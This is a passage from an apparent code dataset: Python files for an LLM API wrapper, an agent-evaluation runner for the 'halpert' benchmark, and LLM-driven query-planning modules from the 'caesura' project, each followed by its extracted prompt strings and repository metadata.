openai = crfmLLM(model_name="openai/text-davinci-003")
"""
client: Any #: :meta private:
model_name: str = "openai/text-davinci-003"
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 300
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
num_completions: int = 1
"""How many completions to generate for each prompt."""
top_k_per_token: int = 1
"""number of candidates per token position in each completion"""
crfm_api_key: Optional[str] = None
max_retries: int = 5
"""Maximum number of retries to make when generating."""
echo_prompt: bool = False
"""Whether to echo the prompt in the response."""
verbose: bool = True
"""Whether to print out the prompt and response"""
@property
def _llm_type(self) -> str:
return "CRFM"
def _call(self, prompt: str,
stop: Optional[List[str]] = []) -> str:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
# Make a request
tries = 0
result = None
while tries < self.max_retries:
try:
tries += 1
if self.verbose:
print(prompt)
request = Request(model=self.model_name,
prompt=prompt,
temperature=self.temperature,
max_tokens=self.max_tokens,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
stop_sequences=stop,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0].text
if self.verbose:
print('------------------')
print(result)
except Exception as e:
print(f"Error: {e}, retrying... ({tries}/{self.max_retries})")
continue
break
assert result is not None
return result
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {"num_completions": self.num_completions,
"model_name": self.model_name,
"temperature": self.temperature,
"max_tokens": self.max_tokens,
"top_p": self.top_p,
"frequency_penalty": self.frequency_penalty,
"presence_penalty": self.presence_penalty,
"top_k_per_token": self.top_k_per_token,
"crfm_api_key": self.crfm_api_key,
"request_timeout": self.request_timeout,
"max_retries": self.max_retries,
"echo_prompt": self.echo_prompt,
}
def echo_prompt(self, prompt: str) -> LLMResult:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
request = Request(model=self.model_name,
prompt=prompt,
echo_prompt=True,
temperature=self.temperature,
max_tokens=0,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0]
return result | [
"False"
] |
2024-01-10 | davidfant/halpert | example~__main__.py | import json
import asyncio
import argparse
import logging
import coloredlogs
# from openai.types.chat import ChatCompletionMessageParam
from tqdm import tqdm
from typing import List, Dict
from halpert import Halpert, Sample, Function
from halpert.util.openai import complete
from .samples import samples
ChatCompletionMessageParam = Dict
logger = logging.getLogger('halpert')
async def run_agent(
sample: Sample,
functions: List[Function],
model: str,
) -> List[Sample.Evaluation.QuizItem]:
messages: List[ChatCompletionMessageParam] = [{
'role': 'system',
'content': 'You are a helpful AI assistant. Follow the instructions and use the available functions to complete the task. Always call functions, and never respond with a text message! Do not make any assumptions about the task, and do not use any outside knowledge.',
}, {
'role': 'user',
'content': sample.instructions,
}]
looping = True
while looping:
completion = complete(
messages=messages,
model=model,
tools=[{
'type': 'function',
'function': {
'name': f.slug,
'description': f.description,
'parameters': f.Input.schema(),
},
} for f in functions] + [{
'type': 'function',
'function': {
'name': 'done',
'description': 'Call this function when you are done with the task.',
'parameters': { 'type': 'object', 'properties': {} },
},
}],
)
# logger.info(f'Agent Step: {completion.json(indent=2)}')
logger.info(f'Agent Step: {json.dumps(completion, indent=2)}')
choice = completion.choices[0]
if choice.finish_reason != 'tool_calls':
logger.warning(f'Unexpected finish reason: {choice.finish_reason}')
break
messages.append({
'role': 'assistant',
# 'tool_calls': choice.message.dict()['tool_calls'],
'tool_calls': choice.message['tool_calls'],
})
for tc in choice.message.tool_calls:
if tc.function.name == 'done':
messages.pop()
looping = False
break
elif fn := next((f for f in functions if f.slug == tc.function.name), None):
output = await fn.call(fn.Input(**json.loads(tc.function.arguments)))
messages.append({
'role': 'tool',
'tool_call_id': tc.id,
'content': json.dumps(output.dict()),
})
logger.info(f'Function call: {fn.slug}({tc.function.arguments}) -> {json.dumps(output.dict(), indent=2)}')
else:
logger.warning(f'Unexpected function call: {tc.function.name}')
looping = False
break
completion = complete(
messages=[{
'role': 'system',
'content': 'You are a helpful AI assistant. Answer the questions based on the messages so far using the answer function. Question:\n' + '\n'.join([f'{i}. {q.question}' for i, q in enumerate(sample.expected.quiz)]),
}] + messages[1:],
tools=[{
'type': 'function',
'function': {
'name': 'answer',
'description': 'Call this function to answer all questions. If you do not know the answer to a specific question, enter an empty string. VERY IMPORTANT: answer all questions, even if you do not know the answer to some of them.',
'parameters': {
'type': 'object',
'properties': {
'num_questions': { 'type': 'integer' },
'answers': {
'type': 'array',
'items': { 'type': 'string' },
},
},
'required': ['answers'],
},
},
}],
model=model,
tool_choice={ 'type': 'function', 'function': { 'name': 'answer' } },
)
# logger.info(f'Agent Questions: {completion.json(indent=2)}')
logger.info(f'Agent Questions: {json.dumps(completion, indent=2)}')
answers = json.loads(completion.choices[0].message.tool_calls[0].function.arguments)['answers']
return [
Sample.Evaluation.QuizItem(question=q.question, answer=a)
for q, a in zip(sample.expected.quiz, answers)
]
async def run():
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default='gpt-4-1106-preview')
parser.add_argument('--odoo-snapshot-dir', type=str)
args = parser.parse_args()
coloredlogs.install(fmt='%(levelname)s %(asctime)s %(name)s %(message)s', level=logging.DEBUG)
logging.getLogger('openai').setLevel(logging.INFO)
logging.getLogger('httpx').setLevel(logging.INFO)
eval = Halpert(samples=samples, odoo_snapshot_dir=args.odoo_snapshot_dir)
for sample in tqdm(eval.samples):
sample_functions = eval.prepare(sample)
logger.info(f'Running sample: {sample.name}')
quiz = await run_agent(sample, sample_functions, args.model)
logger.info(f'Quiz: {json.dumps([q.dict() for q in quiz], indent=2)}')
eval.submit(sample, quiz)
eval.evaluate()
if __name__ == '__main__':
asyncio.run(run())
| [
"You are a helpful AI assistant. Answer the questions based on the messages so far using the answer function. Question:\n",
"\n",
"You are a helpful AI assistant. Follow the instructions and use the available functions to complete the task. Always call functions, and never respond with a text message! Do not make any assumptions about the task, and do not use any outside knowledge."
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~mapping.py | import re
import logging
from langchain import LLMChain
from langchain.schema import AIMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
from caesura.phases.planning import PlanningPhase
from caesura.observations import ExecutionError, Observation, PlanFinished
from caesura.plan import ToolExecution, ToolExecutions
from caesura.utils import parse_args
logger = logging.getLogger(__name__)
class MappingPhase(Phase):
def create_prompt(self, tools):
result = ChatPromptTemplate.from_messages([
self.system_prompt(tools),
HumanMessagePromptTemplate.from_template(INIT_PROMPT),
])
return result
def system_prompt(self, tools):
result = "You are Data-GPT, and you execute informal query plans using a set of tools:\n"
result += self.database.describe()
result += "You can use the following tools:\n"
result += "\n".join([f"{t.name}: {t.description}" for t in tools])
result += "\n" + FORMAT_INSTRUCTIONS
return SystemMessagePromptTemplate.from_template(result)
def init_chat(self, query, tools, plan, relevant_columns, step_nr, **kwargs):
return self.create_prompt(tools).format_prompt(
query=query, plan=str(plan), tool_names=", ".join([t.name for t in tools]),
relevant_columns=relevant_columns.with_tool_hints(), plan_length=len(plan), step_nr=step_nr,
step_prompt=plan[0].get_step_prompt()
).messages
def execute(self, plan, step_nr, tools, chat_history, **kwargs):
if step_nr > len(plan):
raise PlanFinished
prompt = ChatPromptTemplate.from_messages(chat_history)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
step = plan[step_nr - 1]
ai_output = llm_chain.predict(stop=[f"Step {step_nr + 1}"])
chat_history += [AIMessage(content=ai_output)]
logger.info(ai_output)
tool_calls = self.parse_tool_calls(ai_output, tools, step)
step.set_tool_calls(tool_calls)
logger.info(f"Running: Step {step_nr}: {step}")
return ExecutionOutput(
state_update={"plan": plan, "step": step},
chat_history=chat_history,
)
def handle_observation(self, chat_history, observation, step_nr, plan, tools, query, **kwargs):
if step_nr > len(plan):
raise PlanFinished
human_message_template = STEP_PROMPT if step_nr <= len(plan) else "Step {step_nr}: Finished!"
if observation is not None and isinstance(observation, ExecutionError):
self.handle_error(observation, chat_history, query, plan)
elif observation is not None and isinstance(observation, Observation):
msg = observation.get_message()
if msg:
chat_history.append(msg)
step = plan[step_nr - 1]
chat_history.append(HumanMessagePromptTemplate.from_template(human_message_template).format(
step_nr=step_nr, step_prompt=step.get_step_prompt()))
return chat_history
def reinit_chat(self, observation, chat_history, plan, query, relevant_columns, tools, **kwargs):
chat_history.append(observation.get_message(suffix="\nPlease restart from Step 1"))
chat_history.append(HumanMessagePromptTemplate.from_template(INIT_PROMPT))
chat_history = ChatPromptTemplate.from_messages(chat_history).format_prompt(
query=query, plan=str(plan), tool_names=", ".join([t.name for t in tools]),
relevant_columns=relevant_columns.with_tool_hints(), plan_length=len(plan), step_nr=1,
step_prompt=plan[0].get_step_prompt()
).messages
return chat_history
def handle_error(self, error, chat_history, query, plan):
error_tool = ""
error_step = "one of the steps"
if error.step_nr is not None:
error_step = plan[error.step_nr - 1]
error_tool = ", ".join([e.tool.name for e in error_step.tool_execs])
error_tool = f"instead of {error_tool} "
error_step = f"Step {error.step_nr}"
msg = error.get_message(suffix= \
"\nThis was my request: {query} and this is the plan I imagined: {plan}\n\n"\
"To systematically fix this issue, answer the following questions one by one:\n"
"1. What are potential causes for this error? Think step by step.\n"
"2. Explain in detail how this error could be fixed.\n"
"3. Is there a flaw in my plan (e.g. steps missing, wrong input table, ...) (Yes/No)?\n"
"4. Is there a more suitable alternative plan (e.g. extracting information from image/text data instead of tabular metadata or vice versa) (Yes/No)?\n"
"5. Should a different tool {error_tool}be selected for {error_step} (Yes / No)?\n"
"6. Do the input arguments of some of the steps need to be updated (Yes / No)?\n"
)
prompt = ChatPromptTemplate.from_messages(chat_history + [msg])
chain = LLMChain(llm=self.llm, prompt=prompt)
answers = chain.predict(error_step=error_step, error_tool=error_tool, query=query, plan=plan.without_tools())
logger.warning(error)
logger.warning(answers)
fix_idea, wrong_plan_str1, wrong_plan_str2, wrong_tool, wrong_input_args = \
tuple(x.strip() for x in re.split(r"(^1\.|\n2\.|\n3\.|\n4\.|\n5\.|\n6\.)", answers)[slice(4, None, 2)])
error.set_fix_idea(fix_idea)
wrong_input_args, wrong_tool, wrong_plan1, wrong_plan2 = tuple(
"yes" in re.split(r"\W", x.lower())
for x in (wrong_input_args, wrong_tool, wrong_plan_str1, wrong_plan_str2)
)
if wrong_plan1 or wrong_plan2:
if wrong_plan1:
alternative_fix_idea = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", wrong_plan_str1)[4].strip(" .")
if wrong_plan2:
alternative_fix_idea = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", wrong_plan_str2)[4].strip(" .")
if len(alternative_fix_idea) > 5:
error.set_fix_idea(f"To fix the error: {alternative_fix_idea}.")
error.set_target_phase(PlanningPhase)
raise error
if wrong_tool:
error.set_target_phase(MappingPhase)
raise error
chat_history.append(error.get_message(suffix="\nPlease restart from Step 1"))
return chat_history
def parse_tool_calls(self, ai_out, tools, step):
tools_str = [re.split(r"[,\.\n\(\:]", x.strip())[0].strip() for x in re.split("Tool(| [0-9]+):", ai_out)[2::2]]
tool_map = {t.name: t for t in tools}
found_separator = self.check_for_multiple_tools(tools_str)
if found_separator:
tools_str = [x.strip() for t in tools_str for x in t.split(found_separator)]
args_str = [re.split("Tool(| [0-9]+):", x)[0].strip() for x in re.split("Arguments(| [0-9]+):", ai_out)[2::2]]
if found_separator:
args_str = [(x.strip() if x.strip().endswith(")") or not x.strip().startswith("(") else x.strip() + ")")
for a in args_str for x in a.split(")" + found_separator)]
args_str = [" ".join([line.strip() for line in x.split("\n")]) for x in args_str]
args_str = [parse_args(step, x) for x in args_str]
tools_plan = [tool_map[x] for x in tools_str]
tool_execs = ToolExecutions([ToolExecution(x, y) for x, y in zip(tools_plan, args_str)])
return tool_execs
def check_for_multiple_tools(self, tools_str):
separators = (" and ", ",", ";") # in case model decides to use more than one tool
found_separator = None
for t in tools_str:
for s in separators:
if s in t:
found_separator = s
break
if found_separator is not None:
break
return found_separator
STEP_PROMPT = "Step {step_nr}: {step_prompt}"
INIT_PROMPT = "Execute the steps one by one. {relevant_columns}. Take these into account when executing the tools.\n" + \
STEP_PROMPT
FORMAT_INSTRUCTIONS = (
"Use the following output format:\n"
"Step <i>: What to do in this step?\n"
"Reasoning: Reason about which tool should be used for this step. Take datatypes into account.\n"
"Tool: The tool to use, should be one of [{tool_names}]\n"
"Arguments: The arguments to call the tool, separated by ';'. Should be (arg_1; ...; arg_n)\n"
"(if you need more than one tool for this step, follow up with another Tool + Arguments.)"
)
# no improvements with these examples
#
# EXAMPLE_MAPPING = (
# """
# Example Mappings:
# Step X: Left Join the 'patient' and the 'patient_reports' table on the 'patient_id' column to combine the two tables.
# Reasoning: The SQL tool is the only tool that can join two tables.
# Tool: SQL
# Step X: Plot the 'result_table' in a bar plot. The 'diagnosis' should be on the X-axis and the 'mean_age' on the Y-Axis.
# Reasoning: Plots are generated using the 'Plot' tool.
# Tool: Plot
# Step X: Select all rows of the 'pictures' table where the 'image' column depicts a skateboard, by looking the the images.
# Reasoning: In this step, rows need to be selected based on the content of images. Hence, the Image Select tool is appropriate.
# Tool: Image Select
# Step X: Look at the images in the 'image' column of the 'joined_table' table to determine the number of depicted persons.
# Reasoning: Looking at images and extracting information from images (number of depicted persons) requires the use of the Visual Question Answering tool.
# Tool: Visual Question Answering
# """
# )
| [
"Step {step_nr}: Finished!",
"Step {step_nr}: {step_prompt}",
"Execute the steps one by one. {relevant_columns}. Take these into account when executing the tools.\nPLACEHOLDER"
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~discovery.py | from functools import reduce
import logging
import re
from collections import namedtuple
from langchain import LLMChain
from langchain.schema import AIMessage, HumanMessage, SystemMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
logger = logging.getLogger(__name__)
relevant_col_tuple = namedtuple("relevant_column", ["table", "column", "contains", "reasons"])
# no improvements with these examples
#
# EXAMPLE_DISCOVERY = """
# 3.0.1 The 'text_path' column (datatype str) is not relevant to the user's request, because the user didn't query the path and I am not able to open file paths or URLs.
# 3.0.2 No
# 3.1.1 The 'img_url' column (datatype str) is not relevant to the user's request, because the user didn't query the URL and I am not able to access files behind file paths or URLS.
# 3.1.2 No
# 3.2.1 The 'patient_name' column (datatype str) is not relevant, because the user requested to aggregate over patients. Therefore, the patient name is not necessary for the final plot.
# 3.2.2 No
# 3.3.1 The 'patient_report' column (datatype TEXT) is relevant because I am able to read texts in columns of datatype TEXT and the user-queried diagnosis can be extracted from a patient report.
# 3.3.2 Yes, TODO
# 3.4.1 The 'patient_picture' column (datatype IMAGE) is relevant, because I am able to look at images with datatype IMAGE and looking at patient's pictures allows me to determine their gender, which was queried.
# 3.4.2 Yes
# 3.5.1 The 'patient_scan' column (datatype IMAGE) is not relevant, because neither gender nor diagnosis can be determined by looking at the patients' scan.
# 3.5.2 No
# 3.0.1 The 'picture title' (datatype str) is relevant because the user queried for the pictures with the highest number of persons in it. The pictures are identified using their title.
# 3.0.2 Yes
# 3.1.1 The 'picture' (datatype IMAGE) is relevant, because it contains the actual picture necessary to determine the number of persons depicted in it.
# 3.1.2 Yes
# 3.2.1 The 'author' (datatype str) is not relevant, since the user didn't query for the author.
# 3.2.2 No
# 3.3.1 The 'size (kB)' (datatype int) is not relevant, since the user didn't query for the file size.
# 3.3.2 No
# 3.4.1 The 'creation date' (datatype date) is relevant, because the user likes to aggregate by year, which can be determined from the creation date.
# 3.4.2 Yes
# 3.5.1 The 'file path' (datatype str) column is not relevant, since I am not able to follow file paths. The user didn't query for the file path.
# 3.5.2 No
# 3.0.1 The 'img_path' column (datatype str) is not relevant, because I am not able to follow file paths and the user didn't query for the file path.
# 3.0.2 No
# 3.1.1 The 'image' column (datatype IMAGE) is relevant, because it contains the actual images and the user queried for pictures depicting skateboards. Furthermore, the user-queried 'picture perspective' can also be determined by looking at the image.
# 3.1.2 Yes
# """
class DiscoveryPhase(Phase):
def create_prompts(self):
result = {}
for table_name, table in self.database.tables.items():
chat = ChatPromptTemplate.from_messages([
self.system_prompt(table),
HumanMessagePromptTemplate.from_template("My request is: {query}.\n"
"In order to plan the steps to do, You must answer the following questions as precisely as possible.\n"
"1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot?"
" What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n"
"2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n"
"{relevance_questions}"
)
])
result[table_name] = chat
return result
def system_prompt(self, table):
text_columns = ", ".join([c for c in table.get_columns() if table.get_datatype_for_column(c) == "TEXT"])
image_columns = ", ".join([c for c in table.get_columns() if table.get_datatype_for_column(c) == "IMAGE"])
result = "You are Data-GPT, and you can tell users which database tables and columns are relevant for a user request. "
if image_columns:
result += f"You can look at images ({image_columns}) to determine which and how many objects are depicted in the image, and also determine things like the style and type of the image. "
if text_columns:
result += f"You can read and process texts ({text_columns}) to extract information from the text. "
result += "You cannot open file paths or URLs.\n"
# result += "You will be asked to answer a set of questions to determine the relevance of tables and columns. Here are some example answers: \n"
# result += EXAMPLE_DISCOVERY + "\n"
# result += "Now you have to answer similar questions for this Data:\n"
result += self.database.describe()
result += f"Table '{table.name}' =\n" + self.database.peek_table(table, example_text=True)
return SystemMessagePromptTemplate.from_template(result)
def get_prompt_global(self, query, relevant_columns):
system = "You are Data-GPT, and you can tell users which database tables and columns are relevant for a user request. "
system += f"You can look at images (Datatype IMAGE) to determine which and how many objects are depicted in the image, and also determine things like the style and type of the image. "
system += f"You can read and process texts (Datatype TEXT) to extract information from the text. "
system += "You cannot open file paths or URLs.\n"
system += self.database.describe()
system_message = SystemMessagePromptTemplate.from_template(system)
cols = ", ".join(f"{c.table}.{c.column} ({c.contains} {c.reasons})" for c in relevant_columns)
human = f"My request is: {query}. I consider these columns as relevant: {cols}. Answer these questions:\n" \
"1. Are these columns enough to satisfy the request or are there other relevant columns I missed? If they are sufficient, you can skip the other questions.\n" \
"2. Which other columns are relevant? Please provide them in this format:\n- table_1.col_1: <What does the column contain?>\n...\n- table_n.col_n: <What does the column contain?>\n"
human_message = HumanMessage(content=human)
return ChatPromptTemplate.from_messages([system_message, human_message])
def get_hint(self, c, pronoun):
dtype = self.database.get_column_datatype(c.table, c.column) if isinstance(c, relevant_col_tuple) else c
if dtype == "IMAGE":
return f"{pronoun} can easily extract structured information from these images."
if dtype == "TEXT":
return f"{pronoun} can easily extract structured information from these texts."
else:
return f"{pronoun} can transform these values or extract relevant parts, " \
"in case they are not yet in the right format."
def init_chat(self, query, **kwargs):
return {k: v.format_prompt(query=query, relevance_questions=self.get_relevance_questions(k)).messages
for k, v in self.create_prompts().items()}
def execute(self, query, chat_history, **kwargs):
relevant_columns = RelevantColumns(self.database, query, self.llm) if "relevant_columns" not in kwargs \
else kwargs["relevant_columns"]
for table_name, messages in chat_history.items():
if table_name == "__global__":
continue
prompt = ChatPromptTemplate.from_messages(messages)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history[table_name].append(AIMessage(content=ai_output))
cols = self.parse_relevant_columns(table_name, ai_output, self.get_relevance_questions(table_name))
relevant_columns.extend(cols)
if "__global__" not in chat_history:
chat_history["__global__"] = self.get_prompt_global(query, relevant_columns).format_prompt().messages
prompt = ChatPromptTemplate.from_messages(chat_history["__global__"])
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history["__global__"].append(AIMessage(content=ai_output))
for table, column, desc in re.findall("- (\w+)\.(\w+): (.*)",ai_output.split("\n2.")[-1]):
if column.endswith("_id"):
continue
contains = desc.split(".")[0].split(", which")[0].strip()
relevant_columns.append(relevant_col_tuple(table, column, contains + ".", ""))
logger.info(relevant_columns)
return ExecutionOutput(
state_update={"relevant_columns": relevant_columns},
chat_history=chat_history,
)
def handle_observation(self, observation, chat_history, **kwargs):
msg = observation.get_message("Retry answering the above questions!")
result = {}
for table_name, messages in chat_history.items():
new_prompt = ChatPromptTemplate.from_messages([
*messages,
msg
])
result[table_name] = new_prompt.messages
return result
def reinit_chat(self, observation, chat_history, **kwargs):
raise NotImplementedError
def parse_relevant_columns(self, table_name, result, relevance_questions):
answers = [x.strip() for x in result.split("\n") if x.startswith("3")]
col_map = [x.split() for x in relevance_questions.split("\n") if x.startswith("3") and x.endswith("?")]
col_map = {int(x[0].split(".")[1]): x[6] for x in col_map}
is_relevant_nums = set()
contains = dict()
reasons = dict()
for a in answers:
num = a.split(" ")[0]
if num == "3.":
continue
i = int(num.split(".")[1])
answer = a[len(num) + 1:]
if num.endswith("3") and "yes" in re.split(r"\W", answer.lower()):
is_relevant_nums.add(i)
if num.endswith("2"):
reasons[i] = answer
elif num.endswith("1"):
contains[i] = answer.split(".")[0].split(", which")[0].strip() + "."
result = {relevant_col_tuple(table_name, col_map[k], v, reasons[k]) for k, v in contains.items()
if k in is_relevant_nums and k in col_map}
return result
def get_relevance_questions(self, table_name):
result = []
i = 1
table = self.database.tables[table_name]
for i, col in enumerate(table.get_columns()):
dtype = table.get_datatype_for_column(col)
if col.endswith("_id"):
continue
r = f"3.{i}.1 What is contained in column {col} (table {table_name}, datatype {dtype}) ?\n" \
f"3.{i}.2 Why or why not is column {table_name}.{col} relevant for the query ({self.get_hint(dtype, 'Data-GPT')})?.\n" \
f"3.{i}.3 Final decision whether column {table_name}.{col} is relevant (Yes / No).\n"
result.append(r)
i += 1
return "\n".join(result)
class RelevantColumns(list):
def __init__(self, database, query, llm):
self.database = database
self.query = query
self.example_values = dict()
self.llm = llm
self.relevant_values_via_index = list()
self.tool_hints = dict()
self.default_hints = dict()
super().__init__()
def __str__(self, with_tool_hints=False, with_join_hints=False, detail_occurrence_limit=2):
if len(self) == 0:
return ""
hints = self.tool_hints if with_tool_hints else self.default_hints
self.set_relevant_values_via_index(self.relevant_values_via_index)
table_occurrences = reduce(lambda a, b: {k: (a.get(k, 0) + b.get(k, 0)) for k in (set(a) | set(b))},
[{c.table: 1} for c in self])
result = "These columns (among others) are potentially relevant:\n"
result += "\n".join(
(f"- The '{c.column}' column of the '{c.table}' table might be relevant. {c.contains} "
f"These are some relevant values for the column: {self.example_values[c]}." + hints.get(c, ""))
for c in self if table_occurrences[c.table] <= detail_occurrence_limit
) + "\n"
short_relevant = [f"{c.table}.{c.column} (example values {self.example_values[c][:2]})"
for c in self if table_occurrences[c.table] > detail_occurrence_limit]
if len(short_relevant):
result += "- The columns " + ", ".join(short_relevant) + " might also be relevant."
if with_join_hints:
result += " " + self.get_join_columns()
return result
def get_join_columns(self):
result = set()
for col in set(c.table for c in self):
result |= self.dfs(col, frozenset(c.table for c in self))
return "\n - These are relevant primary / foreign keys: " + ", ".join(f"{t1}.{t2}"
for t1, t2 in sorted(result, key=lambda x: x[1]))
def dfs(self, table, relevant_tables, path=(), visited=frozenset()):
result = set()
for link in self.database.tables[table].links:
neighbor, neighbor_col = next(iter(
(t.name, c) for t, c in ((link.table1, link.column1), (link.table2, link.column2)) if t.name != table))
if neighbor in visited:
continue
table, table_col = next(iter(
(t.name, c) for t, c in ((link.table1, link.column1), (link.table2, link.column2)) if t.name == table))
step = ((table, table_col), (neighbor, neighbor_col))
this_path = path + step
if neighbor in relevant_tables:
result |= set(this_path)
else:
result |= self.dfs(neighbor, relevant_tables, this_path, visited=frozenset(visited | {table}))
return result
def with_tool_hints(self):
return self.__str__(with_tool_hints=True)
def with_join_hints(self):
return self.__str__(with_join_hints=True)
def __contains__(self, other: object) -> bool:
inside = {(c.table, c.column) for c in self}
return (other.table, other.column) in inside
def append(self, c):
if c in self or c.table not in self.database.tables or \
c.column not in self.database.tables[c.table].data_frame.columns:
return
super().append(c)
if c.table not in self.database.tables or c.column not in self.database.tables[c.table].data_frame.columns:
return
self.example_values[c] = self.database.tables[c.table].data_frame[c.column][:30].unique()[:10].tolist()
if self.database.get_column_datatype(c.table, c.column) == "IMAGE":
self.example_values[c] = self.example_values[c][:3]
self.default_hints[c] = f" You should look at images in {c.table}.{c.column} to figure out what they depict."
self.tool_hints[c] = f" Use Visual Question Answering to look at the images in {c.table}.{c.column} and extract information. Use Image Select to filter rows by what is depicted on the images."
if self.database.get_column_datatype(c.table, c.column) == "TEXT":
self.example_values[c] = self.example_values[c][:3]
self.example_values[c] = ["<TEXT>" for _ in self.example_values[c]]
self.default_hints[c] = f" You should read the texts in {c.table}.{c.column} to figure out what they contain."
self.tool_hints[c] = f" Use Text Question Answering to read the texts in {c.table}.{c.column} and extract information from them."
if self.database.has_relevant_values_index(c.table, c.column):
self.relevant_values_via_index.append(c)
def extend(self, cols):
for c in cols:
self.append(c)
def set_relevant_values_via_index(self, cols):
if len(cols) == 0:
return
prompt = ChatPromptTemplate.from_messages([
SystemMessage(content="Extract potentially relevant keywords from queries given some column names."),
HumanMessage(content="Query: Get the place of birth of every US president.\n"
"Columns: politician.name, politician.country, politician.rank, politician.place_of_birth"),
AIMessage(content="politician.country: US, USA, United States of America\npolitician.rank: president"),
HumanMessage(content="Query: Plot the doses of acetylsalicylic acid for all drugs against "
"fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose"),
AIMessage(content="drug.disease: fever\ndrugs.active_ingredient: acetylsalicylic acid, ASA"),
HumanMessagePromptTemplate.from_template("Query: {query}\ncolumns: {columns}")
])
columns = ", ".join(f"{c.table}.{c.column}" for c in cols)
chain = LLMChain(llm=self.llm, prompt=prompt)
result = chain.predict(query=self.query, columns=columns)
mapping = {(c.table, c.column): c for c in self}
for line in result.split("\n"):
if ":" not in line:
continue
column, keywords = tuple(x.strip() for x in line.split(":"))
table, column = column.split(".")
if table not in self.database.tables or column not in self.database.tables[table].data_frame.columns:
continue
keywords = [x.strip() for x in keywords.split(",")]
values = self.database.get_relevant_values(table, column, keywords)
self.example_values[mapping[table, column]] = values
self.relevant_values_via_index = []
| [
"2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n",
"fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose",
"1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot?",
"Columns: politician.name, politician.country, politician.rank, politician.place_of_birth",
"Query: {query}\ncolumns: {columns}",
"{relevance_questions}",
"politician.country: US, USA, United States of America\npolitician.rank: president",
"[PLACEHOLDER, PLACEHOLDER]",
"__global__",
"Query: Plot the doses of acetylsalicylic acid for all drugs against ",
"drug.disease: fever\ndrugs.active_ingredient: acetylsalicylic acid, ASA",
" What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n",
"In order to plan the steps to do, You must answer the following questions as precisely as possible.\n",
"Query: Get the place of birth of every US president.\nColumns: politician.name, politician.country, politician.rank, politician.place_of_birth",
"My request is: {query}.\n",
"Query: Plot the doses of acetylsalicylic acid for all drugs against fever for each producer.\nColumns: drugs.name, drugs.disease, drugs.active_ingredient, drugs.dose",
"My request is: {query}.\nIn order to plan the steps to do, You must answer the following questions as precisely as possible.\n1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot? What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n{relevance_questions}",
"Extract potentially relevant keywords from queries given some column names.",
"Query: Get the place of birth of every US president.\n"
] |
2024-01-10 | DataManagementLab/caesura | caesura~observations.py | from langchain.prompts.chat import HumanMessagePromptTemplate
class Observation(Exception):
def __init__(self, *, description=None, step_nr=None, add_step_nr=None, target_phase=None,
plan_step_info=None):
self.description = description
self.step_nr = step_nr
self.add_step_nr = add_step_nr
self.target_phase = target_phase
self.handled = False
self.plan_step_info = plan_step_info
def set_target_phase(self, target_phase):
self.target_phase = target_phase
def __str__(self):
result = f"Observation{(' from Step ' + str(self.step_nr)) if self.step_nr is not None else ''}. "
if self.description:
result += self.description
return result
def set_step_number(self, i):
if self.add_step_nr:
self.step_nr = i
def get_message(self, suffix=None):
msg = str(self)
if suffix:
msg += " " + suffix
prompt = HumanMessagePromptTemplate.from_template(msg)
if len(prompt.input_variables) == 0:
return prompt.format()
return prompt
class ExecutionError(Observation):
def __init__(self, *, description=None, step_nr=None, original_error=None, add_step_nr=True, target_phase=None):
self.description = description
self.original_error = original_error
self.step_nr = step_nr
self.add_step_nr = add_step_nr
self.fix_idea = None
self.target_phase = target_phase
self.handled = False
def set_fix_idea(self, fix_idea):
self.fix_idea = fix_idea
def __str__(self):
result = f"Something went wrong{(' in Step ' + str(self.step_nr)) if self.step_nr is not None else ''}! "
if self.original_error:
result += f"{type(self.original_error).__name__}({self.original_error}). "
if self.description:
result += self.description + " "
if self.fix_idea:
result += "\nThis is how it can be fixed: " + self.fix_idea
return result.strip()
class PlanFinished(Observation):
def __init__(self):
pass
def __str__(self):
return "Plan successfully executed!"
| [] |
2024-01-10 | DataManagementLab/caesura | caesura~tools~python.py | import re
